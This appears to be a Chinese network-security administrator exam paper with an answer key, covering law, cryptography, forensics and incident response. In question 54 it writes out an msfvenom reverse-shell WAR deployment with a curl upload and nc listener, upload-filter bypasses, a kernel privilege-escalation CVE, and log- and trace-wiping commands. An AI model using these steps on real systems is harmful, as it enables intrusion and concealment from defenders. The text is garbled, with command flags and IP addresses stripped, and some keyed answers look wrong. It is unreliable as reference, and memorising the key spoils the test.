2025年網(wǎng)絡(luò)信息安全管理員考試筆試試題(含答案)一、單項(xiàng)選擇題（每題1分，共30分。每題只有一個(gè)正確答案，請(qǐng)將正確選項(xiàng)的字母填在括號(hào)內(nèi)）1.在《網(wǎng)絡(luò)安全法》中，關(guān)鍵信息基礎(chǔ)設(shè)施的運(yùn)營(yíng)者采購(gòu)網(wǎng)絡(luò)產(chǎn)品或服務(wù)時(shí)，應(yīng)當(dāng)履行的安全義務(wù)是（）。A.向公安機(jī)關(guān)備案B.通過(guò)國(guó)家網(wǎng)絡(luò)安全審查C.向工信部申請(qǐng)?jiān)S可D.向供應(yīng)商索取源代碼答案：B2.下列關(guān)于SSL/TLS握手協(xié)議的說(shuō)法，正確的是（）。A.握手完成后仍使用明文傳輸B.握手階段僅協(xié)商對(duì)稱密鑰C.服務(wù)端證書(shū)用于驗(yàn)證服務(wù)端身份D.客戶端證書(shū)必須由國(guó)家CA簽發(fā)答案：C3.某單位采用RAID5存儲(chǔ)重要日志，若同時(shí)損壞兩塊磁盤(pán)，則（）。A.可通過(guò)熱備盤(pán)自動(dòng)恢復(fù)B.需人工干預(yù)但數(shù)據(jù)可完整恢復(fù)C.數(shù)據(jù)一定丟失D.可通過(guò)異或運(yùn)算恢復(fù)答案：C4.在Linux系統(tǒng)中，若文件權(quán)限為“rwsrxrx”，則對(duì)該文件描述正確的是（）。A.所有用戶均可寫(xiě)B(tài).屬主執(zhí)行時(shí)具有屬主權(quán)限C.屬組用戶可刪除該文件D.其他用戶可修改文件內(nèi)容答案：B5.關(guān)于零信任架構(gòu)，下列說(shuō)法錯(cuò)誤的是（）。A.默認(rèn)信任內(nèi)網(wǎng)流量B.以身份為基石C.動(dòng)態(tài)訪問(wèn)控制D.持續(xù)信任評(píng)估答案：A6.利用“arps”命令靜態(tài)綁定網(wǎng)關(guān)MAC地址，主要防范的攻擊是（）。A.ICMP重定向B.ARP欺騙C.DHCP耗盡D.SYNFlood答案：B7.在GB/T222392019《信息安全技術(shù)網(wǎng)絡(luò)安全等級(jí)保護(hù)基本要求》中，第三級(jí)要求“剩余信息保護(hù)”主要針對(duì)（）。A.網(wǎng)絡(luò)邊界B.主機(jī)內(nèi)存C.機(jī)房空調(diào)D.審計(jì)報(bào)表答案：B8.某Web應(yīng)用使用JWT作為會(huì)話令牌，若服務(wù)端僅使用HS256對(duì)稱密鑰簽名且密鑰硬編碼在客戶端，則存在的最大風(fēng)險(xiǎn)是（）。A.重放攻擊B.令牌偽造C.會(huì)話固定D.XSS答案：B9.在Windows事件日志中，登錄類型“3”表示（）。A.交互式登錄B.網(wǎng)絡(luò)登錄C.批處理登錄D.服務(wù)登錄答案：B10.使用nmap掃描命令“nmapsSp165535/24”，其中“sS”的含義是（）。A.TCPConnect掃描B.SYN隱秘掃描C.UDP掃描D.ACK掃描答案：B11.關(guān)于國(guó)密算法SM2，下列說(shuō)法正確的是（）。A.分組長(zhǎng)度為128位B.基于橢圓曲線離散對(duì)數(shù)難題C.僅用于密鑰交換D.簽名速度低于RSA1024答案：B12.在Python中，若需防止SQL注入，最佳實(shí)踐是（）。A.使用字符串拼接B.使用ORM且關(guān)閉預(yù)編譯C.使用參數(shù)化查詢D.過(guò)濾單引號(hào)即可答案：C13.某企業(yè)部署了EDR終端檢測(cè)響應(yīng)系統(tǒng)，其數(shù)據(jù)采集最依賴的層是（）。A.網(wǎng)絡(luò)層B.傳輸層C.主機(jī)層D.應(yīng)用層答案：C14.關(guān)于DNSSEC，下列記錄類型用于存放公鑰的是（）。A.AAAAB.RRSIGC.DNSKEYD.NSEC3答案：C15.在防火墻規(guī)則中，statefulinspection相較包過(guò)濾最大的優(yōu)勢(shì)是（）。A.處理速度更快B.可跟蹤連接狀態(tài)C.無(wú)需配置規(guī)則D.可防御DDoS答案：B16.某郵件服務(wù)器收到一封郵件，其SPF記錄為“v=spf1ip4:/24all”，若源IP為，則接收方策略應(yīng)為（）。A.中立B.軟拒絕C.硬拒絕D.重試答案：C17.在滲透測(cè)試報(bào)告中，CVSSv3.1評(píng)分“8.9”屬于（）。A.低危B.中危C.高危D.嚴(yán)重答案：C18.關(guān)于內(nèi)存保護(hù)機(jī)制DEP，其原理是（）。A.棧不可執(zhí)行B.堆不可讀C.代碼段不可寫(xiě)D.隨機(jī)基址答案：A19.在Kubernetes中，用于限制容器CPU使用量的資源字段是（）。A.requests.cpuB.limits.cpuC.maxSurgeD.revisionHistoryLimit答案：B20.某單位采用“321”備份策略，其中“1”指（）。A.至少1份離線副本B.至少1臺(tái)備份服務(wù)器C.至少1次全量/天D.至少1份加密答案：A21.關(guān)于WAF繞過(guò)技術(shù)，下列利用的是協(xié)議解析差異的是（）。A.Unicode編碼B.JSON注釋C.分塊傳輸D.參數(shù)污染答案：D22.在ISO/IEC27001:2022中，關(guān)于供應(yīng)商管理屬于（）。A.A.5信息安全策略B.A.6組織安全C.A.15供應(yīng)商關(guān)系D.A.18合規(guī)性答案：C23.某員工收到“內(nèi)部補(bǔ)貼登記”二維碼，掃碼后自動(dòng)下載木馬，此類攻擊歸類為（）。A.BaitingB.QuidproquoC.PretextingD.Spearphishing答案：A24.在Wireshark中，過(guò)濾表達(dá)式“tcp.flags.syn==1andtcp.flags.ack==0”可捕獲（）。A.SYNACK包B.純SYN包C.FIN包D.RST包答案：B25.關(guān)于區(qū)塊鏈51%攻擊，成功后可實(shí)現(xiàn)（）。A.任意增發(fā)代幣B.雙花C.破解私鑰D.修改他人余額答案：B26.在Windows中，用于查看當(dāng)前登錄用戶SID的命令是（）。A.whoami/userB.netuserC.quserD.gpresult答案：A27.關(guān)于云原生安全，CSPM主要解決（）。A.容器逃逸B.配置合規(guī)C.微服務(wù)通信D.鏡像漏洞答案：B28.在SIEM關(guān)聯(lián)規(guī)則中，若設(shè)定“5分鐘內(nèi)同一源IP登錄失敗≥30次”觸發(fā)告警，該規(guī)則主要檢測(cè)（）。A.暴力破解B.橫向移動(dòng)C.數(shù)據(jù)滲漏D.權(quán)限提升答案：A29.關(guān)于GDPR，對(duì)數(shù)據(jù)控制者處以最高罰款的依據(jù)是（）。A.第58條B.第83條C.第29條D.第99條答案：B30.在Android應(yīng)用逆向中，可查看組件聲明的文件是（）。A.classes.dexB.AndroidManifest.xmlC.resources.arscD.lib.so答案：B二、多項(xiàng)選擇題（每題2分，共20分。每題有兩個(gè)或兩個(gè)以上正確答案，多選、少選、錯(cuò)選均不得分）31.以下哪些屬于對(duì)稱加密算法（）。A.SM4B.AES128GCMC.RSA2048D.3DES答案：ABD32.關(guān)于日志審計(jì)，下列做法符合等級(jí)保護(hù)第三級(jí)要求的有（）。A.審計(jì)覆蓋用戶登錄、權(quán)限變更B.審計(jì)記錄保存6個(gè)月C.審計(jì)進(jìn)程無(wú)法被非授權(quán)中斷D.審計(jì)記錄僅存儲(chǔ)在本地磁盤(pán)答案：ABC33.以下哪些命令可用于Linux提權(quán)信息收集（）。A.sudolB.idC.unameaD.tasklist答案：ABC34.關(guān)于HTTP響應(yīng)頭安全，下列配置正確的有（）。A.XContentTypeOptions:nosniffB.XFrameOptions:DENYC.ContentSecurityPolicy:defaultsrcD.StrictTransportSecurity:maxage=0答案：AB35.以下屬于OWASPTop102021新增風(fēng)險(xiǎn)的有（）。A.失效的訪問(wèn)控制B.加密失敗C.服務(wù)端請(qǐng)求偽造D.不安全的反序列化答案：C36.關(guān)于勒索軟件防御，有效的技術(shù)措施包括（）。A.網(wǎng)絡(luò)分段B.白名單機(jī)制C.定期離線備份D.關(guān)閉所有宏腳本答案：ABC37.在Python代碼審計(jì)中，可導(dǎo)致命令注入的函數(shù)有（）。A.os.systemB.subprocess.call(shell=True)C.execD.open答案：ABC38.關(guān)于IPv6安全，以下說(shuō)法正確的有（）。A.IPSec為強(qiáng)制實(shí)現(xiàn)B.地址空間巨大可防掃描C.無(wú)需NAT故易暴露拓?fù)銬.RA可偽造導(dǎo)致劫持答案：BCD39.以下屬于社會(huì)工程學(xué)防御措施的有（）。A.雙人控制B.安全意識(shí)培訓(xùn)C.紅藍(lán)對(duì)抗D.桌面演練答案：ABCD40.關(guān)于云安全責(zé)任共擔(dān)模型，云服務(wù)商負(fù)責(zé)的有（）。A.物理基礎(chǔ)設(shè)施B.虛擬化層C.客戶數(shù)據(jù)D.應(yīng)用配置答案：AB三、填空題（每空2分，共20分）41.在Linux系統(tǒng)中，文件/etc/shadow中密碼字段為“!!”表示該賬戶________。答案：已被鎖定42.使用openssl生成RSA私鑰時(shí)，默認(rèn)填充模式為_(kāi)_______。答案：PKCS843.在SQLMap中，參數(shù)“tamper=space2comment”的作用是________。答案：將空格替換為注釋符繞過(guò)過(guò)濾44.國(guó)家標(biāo)準(zhǔn)GB/T397862021《信息安全技術(shù)信息系統(tǒng)密碼應(yīng)用基本要求》中，物理和環(huán)境安全層面要求采用________技術(shù)對(duì)重要區(qū)域進(jìn)行訪問(wèn)控制。答案：密碼45.在Windows日志中，事件ID________表示成功清除審計(jì)日志。答案：110246.使用Hydra對(duì)SSH進(jìn)行暴力破解時(shí)，常用模塊名為_(kāi)_______。答案：ssh47.在Kubernetes中，ServiceAccount令牌默認(rèn)以________方式掛載到Pod。答案：ProjectedVolume48.在BGP安全中，用于驗(yàn)證路由起源的RPKI依賴的資源證書(shū)格式為_(kāi)_______。答案：X.50949.在無(wú)線滲透中，WPA3SAE握手可防止________攻擊。答案：離線字典50.在Python3中，使用hashlib計(jì)算SM3摘要需先安裝第三方庫(kù)________。答案：gmssl四、簡(jiǎn)答題（每題10分，共30分）51.簡(jiǎn)述內(nèi)存馬（MemoryWebShell）檢測(cè)與清除的關(guān)鍵步驟。答案：1.檢測(cè)：（1）利用JavaAgent遍歷所有已加載類，對(duì)比可疑類名、類加載器、字節(jié)碼特征；（2）通過(guò)JVMInstrumentAPI獲取類字節(jié)碼，計(jì)算哈希與基線庫(kù)比對(duì)；（3）監(jiān)控內(nèi)存中新增Filter、Servlet、Listener，檢查動(dòng)態(tài)注冊(cè)無(wú)落地文件；（4）使用內(nèi)存取證工具（如memdump+Volatility）提取heap，搜索冰蝎、哥斯拉等密鑰字符串。2.清除：（1）通過(guò)InstrumentationredefineClasses將惡意類字節(jié)碼替換為空或拋出異常；（2）卸載異常ClassLoader，觸發(fā)FullGC回收；（3）在web.xml或Spring配置中顯式刪除惡意組件注冊(cè)；（4）重啟JVM確保完全釋放；（5）復(fù)盤(pán)攻擊入口，修補(bǔ)上傳漏洞、升級(jí)中間件。52.說(shuō)明DNS隧道攻擊原理，并給出三種有效檢測(cè)方法。答案：原理：攻擊者將C&C數(shù)據(jù)封裝在DNS查詢/響應(yīng)的域名或TXT記錄中，利用53端口UDP穿透防火墻，實(shí)現(xiàn)隱蔽通信。檢測(cè)方法：1.流量特征：統(tǒng)計(jì)單臺(tái)主機(jī)域名長(zhǎng)度>50字節(jié)、entropy>4.5且請(qǐng)求頻率>1000次/小時(shí)，觸發(fā)告警；2.域名分析：對(duì)子域名進(jìn)行Ngram建模，發(fā)現(xiàn)隨機(jī)可讀性低且與DGA庫(kù)相似度>90%；3.負(fù)載檢測(cè)：對(duì)TXT記錄大小>200字節(jié)且響應(yīng)包持續(xù)分片，進(jìn)行深度解碼，發(fā)現(xiàn)含base32編碼的Shell指令。53.某單位采用MySQL主從復(fù)制，簡(jiǎn)述當(dāng)主庫(kù)遭受勒索軟件加密后，如何在不支付贖金的前提下最大化恢復(fù)數(shù)據(jù)。答案：1.立即隔離主庫(kù)，關(guān)閉網(wǎng)絡(luò)防止擴(kuò)散；2.檢查從庫(kù)是否被加密：若未加密且延遲<1秒，立即執(zhí)行“stopslave”保留純凈數(shù)據(jù)；3.對(duì)從庫(kù)做全量冷備：mysqldumpsingletransactionmasterdata=2>clean.sql；4.拉取主庫(kù)binlog，使用mysqlbinlog解析未被加密的pos點(diǎn)，做增量恢復(fù)；5.在新實(shí)例導(dǎo)入clean.sql，應(yīng)用binlog到攻擊前pos；6.業(yè)務(wù)驗(yàn)證后，將從庫(kù)提升為主庫(kù)，修改應(yīng)用連接；7.對(duì)舊主庫(kù)進(jìn)行鏡像取證，追蹤入侵路徑；8.建立延遲復(fù)制+離線備份，完善321策略。五、綜合應(yīng)用題（共50分）54.滲透測(cè)試實(shí)戰(zhàn)分析（20分）背景：授權(quán)對(duì)IP5進(jìn)行黑盒測(cè)試，發(fā)現(xiàn)其開(kāi)放8080端口運(yùn)行Tomcat9.0.83，默認(rèn)頁(yè)面存在“/examples”目錄，可上傳war包。任務(wù)：（1）寫(xiě)出制作并部署Webshell的完整命令序列（使用msfvenom生成JSP反向Shell，LHOST=，LPORT=4444）；（6分）（2）說(shuō)明如何繞過(guò)可能的“.jsp”上傳過(guò)濾；（4分）（3）成功反彈Shell后，發(fā)現(xiàn)目標(biāo)為Ubuntu22.04內(nèi)核5.15.067，給出本地權(quán)限提升的利用鏈（給出CVE編號(hào)及利用要點(diǎn)，無(wú)需細(xì)節(jié)）；（6分）（4）在清除痕跡階段，需刪除哪些日志及命令。（4分）答案：（1）msfvenompjava/jsp_shell_reverse_tcpLHOST=LPORT=4444fwaroshell.warcurlXPOSTF"file=@shell.war"5:8080/examples/upload.jspnclvnp4444（2）將shell.war重命名為shell.jspx利用Tomcat解析差異；或打包時(shí)在WEBINF/web.xml中注冊(cè)<jspfile>shell.jsp</jspfile>，實(shí)際文件名用shell.png繞過(guò)前端檢測(cè)，后利用PUT方法上傳至/examples/，再通過(guò)MOVE重命名為shell.war。（3）CVE20232640GameOver(lay)Ubuntu本地提權(quán)，利用overlayfs未授權(quán)掛載，普通用戶可寫(xiě)/etc/passwd。（4）刪除~/.bash_history、/var/log/tomcat/localhost_access_log.、/var/log/auth.log中相關(guān)條目，使用sedi'//d'文件；清空systemdjournal：journalctlvacuumtime=1s；重置inode時(shí)間：touchr/bin/sh/tmp/shell.war。55.安全運(yùn)營(yíng)與應(yīng)急響應(yīng)（15分）場(chǎng)景：2025060109:10，SIEM產(chǎn)生高危告警：內(nèi)網(wǎng)IP00對(duì)域控的445端口大量發(fā)送異常SMB流量，特征為“TreeConnectAndXRequest”中ShareName=“ADMIN$”失敗次數(shù)>500次。問(wèn)題：（1）判斷攻擊階段并說(shuō)明依據(jù)；（3分）（2）給出遏制攻擊的三種立即處置措施；（6分）（3）若需提取攻擊者橫向移動(dòng)證據(jù)，應(yīng)重點(diǎn)采集哪些Windows取證工件？（6分）答案：（1）橫向移動(dòng)階段，依據(jù)：利用ADMIN$默認(rèn)共享嘗試連接域控，為PasstheHash或暴力破解的前置步驟。（2）1.在核心交換機(jī)上對(duì)00做ACL丟棄445出口流量；2.禁用該主機(jī)賬戶或下線隔離；3.在域控上立即啟用Windows防火墻入站規(guī)則禁止/24訪問(wèn)445。（3）1.域控%SystemRoot%\System32\winevt\Logs\Security.evtx，篩選事件ID4625、4624、4672；2.注冊(cè)表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares，查看異常共享訪問(wèn)；3.內(nèi)存轉(zhuǎn)儲(chǔ)提取lsass.